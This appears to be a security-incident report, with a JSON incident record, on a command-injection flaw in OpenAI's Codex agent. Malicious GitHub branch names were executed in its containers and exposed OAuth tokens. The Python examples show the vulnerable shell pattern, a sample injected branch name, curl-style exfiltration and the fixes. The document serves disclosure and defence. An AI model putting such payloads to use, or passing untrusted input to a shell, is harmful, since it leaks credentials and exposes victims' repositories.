OpenAI Codex Vulnerability Exposed GitHub Tokens via Command Injection
A critical security flaw in OpenAI’s Codex, an AI-powered coding assistant integrated with GitHub, could have allowed attackers to steal GitHub OAuth tokens through a command injection vulnerability. The issue stemmed from improper handling of branch names during task execution, enabling malicious actors to inject arbitrary shell commands into the containerized environments where Codex operates.
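The injection pattern described above can be sketched in Python. This is a hypothetical illustration of the general vulnerability class, not OpenAI’s actual task-execution code; `echo` stands in for whatever git command a Codex task would run inside its container.

```python
import subprocess

# Hypothetical stand-in for a task runner that interpolates an untrusted
# branch name into a shell command line (the vulnerable pattern).
def checkout_vulnerable(branch: str) -> str:
    # shell=True hands the whole string to /bin/sh, so shell
    # metacharacters in the branch name become live syntax.
    result = subprocess.run(
        f"echo checking out {branch}",
        shell=True, capture_output=True, text=True,
    )
    return result.stdout

# Safer pattern: pass argv as a list so the branch name is a single,
# opaque argument that no shell ever parses.
def checkout_safe(branch: str) -> str:
    result = subprocess.run(
        ["echo", "checking out", branch],
        capture_output=True, text=True,
    )
    return result.stdout

# A branch name carrying an injected command:
evil_branch = "main; echo INJECTED"
```

Calling `checkout_vulnerable(evil_branch)` prints `INJECTED` on its own line, because the shell executed the attacker’s second command; `checkout_safe(evil_branch)` treats the entire name as one harmless argument. A real payload would replace the injected `echo` with something like a `curl` call that exfiltrates the task’s GitHub token.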
Researchers demonstrated that the flaw could be exploited to extract short-lived GitHub tokens, which are used to authenticate repository access. These tokens could then be exposed via task outputs or external network requests, granting attackers potential access to sensitive organizational resources. The vulnerability extended beyond the web interface, affecting CLI tools, SDKs, and IDE integrations, where locally stored credentials could be leveraged to reproduce the attack.
The risk was particularly acute in enterprise environments, where Codex often has broad permissions across multiple repositories. By embedding malicious payloads in GitHub branch names, an attacker with repository access could compromise multiple users interacting with the same project, enabling lateral movement within GitHub and large-scale exploitation.
OpenAI has since patched the vulnerability, implementing stricter input validation, shell escaping protections, and tighter token controls to mitigate exposure. The company also reduced token scope and lifetime during task execution. The incident underscores the growing security challenges of AI-driven development tools, which operate as live execution environments with access to sensitive credentials. As AI agents become more embedded in developer workflows, securing their containerized environments and input processing will require the same rigor as traditional application security boundaries.
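The remediations described above — stricter input validation combined with shell escaping — can be sketched as a simple allow-list gate. The code below is a generic hardening pattern, not OpenAI’s actual patch: the regex loosely mirrors git’s ref-name character rules, and `shlex.quote` guards any name that must still pass through a shell.

```python
import re
import shlex

# Conservative allow-list loosely modeled on git ref-name rules; a
# production system should defer to `git check-ref-format` instead.
_SAFE_BRANCH = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]*")

def sanitize_branch(branch: str) -> str:
    """Reject suspicious branch names, then shell-quote the survivor."""
    if not _SAFE_BRANCH.fullmatch(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    # Defense in depth: quoting is a no-op for names the regex admits,
    # but protects callers if the allow-list is ever loosened.
    return shlex.quote(branch)
```

`sanitize_branch("feature/login")` returns the name unchanged, while a payload such as `"main; curl attacker.example"` raises `ValueError` before any shell sees it. Requiring an alphanumeric first character also blocks option injection via branch names beginning with `-`.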
OpenAI cybersecurity rating report: https://www.rankiteo.com/company/openai
GitHub cybersecurity rating report: https://www.rankiteo.com/company/github
"id": "OPEGIT1774889403",
"linkid": "openai, github",
"type": "Vulnerability",
"date": "3/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"
{
  "affected_entities": [
    {
      "customers_affected": "Enterprise users of OpenAI Codex with GitHub integration",
      "industry": "Artificial Intelligence",
      "name": "OpenAI",
      "type": "Technology Company"
    },
    {
      "customers_affected": "Users with repositories accessed via OpenAI Codex",
      "industry": "Technology",
      "name": "GitHub",
      "type": "Software Development Platform"
    }
  ],
  "attack_vector": "Malicious branch names in GitHub repositories",
  "data_breach": {
    "data_exfiltration": "Potential exposure via task outputs or external network requests",
    "sensitivity_of_data": "High (authentication tokens for repository access)",
    "type_of_data_compromised": "GitHub OAuth tokens"
  },
  "description": "A critical security flaw in OpenAI’s Codex, an AI-powered coding assistant integrated with GitHub, could have allowed attackers to steal GitHub OAuth tokens through a command injection vulnerability. The issue stemmed from improper handling of branch names during task execution, enabling malicious actors to inject arbitrary shell commands into containerized environments where Codex operates. Researchers demonstrated that the flaw could be exploited to extract short-lived GitHub tokens, which could then be exposed via task outputs or external network requests, granting attackers potential access to sensitive organizational resources. The vulnerability affected CLI tools, SDKs, and IDE integrations, where locally stored credentials could be leveraged to reproduce the attack. The risk was particularly acute in enterprise environments, where Codex often has broad permissions across multiple repositories.",
  "impact": {
    "brand_reputation_impact": "Potential reputational damage due to security flaw in AI-driven development tool",
    "data_compromised": "GitHub OAuth tokens",
    "operational_impact": "Potential unauthorized access to sensitive organizational resources",
    "systems_affected": ["CLI tools", "SDKs", "IDE integrations", "Containerized environments"]
  },
  "lessons_learned": "The incident underscores the growing security challenges of AI-driven development tools, which operate as live execution environments with access to sensitive credentials. Securing their containerized environments and input processing requires the same rigor as traditional application security boundaries.",
  "post_incident_analysis": {
    "corrective_actions": "Stricter input validation, shell escaping protections, tighter token controls, reduced token scope and lifetime",
    "root_causes": "Improper handling of branch names during task execution in containerized environments"
  },
  "response": {
    "containment_measures": "Stricter input validation, shell escaping protections, tighter token controls",
    "remediation_measures": "Reduced token scope and lifetime during task execution"
  },
  "title": "OpenAI Codex Vulnerability Exposed GitHub Tokens via Command Injection",
  "type": "Command Injection",
  "vulnerability_exploited": "Improper handling of branch names during task execution"
}